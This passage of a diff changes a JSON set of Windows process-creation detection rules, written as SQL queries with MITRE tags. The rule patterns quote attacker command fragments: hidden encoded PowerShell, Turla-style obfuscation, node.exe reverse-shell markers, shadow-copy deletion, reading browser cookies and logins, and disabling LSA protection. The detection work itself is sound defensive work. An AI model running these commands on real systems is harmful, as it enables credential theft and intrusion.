"proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, 
Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND 
CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", + "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as 
reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" - }, - { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
= 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 
execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Suspicious Execution of Systeminfo", + "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "status": "experimental", + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_systeminfo_execution.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], 
"falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" + 
"attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE 
'%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + 
"filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Administrative scripts" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", "attack.impact", 
- "attack.t1529" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.010" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. 
The PID/Process Name of the process being dumped needs to be investigated" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Administrative scripts." 
+ "Legitimate use for tracing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate administration use" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + 
"filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": 
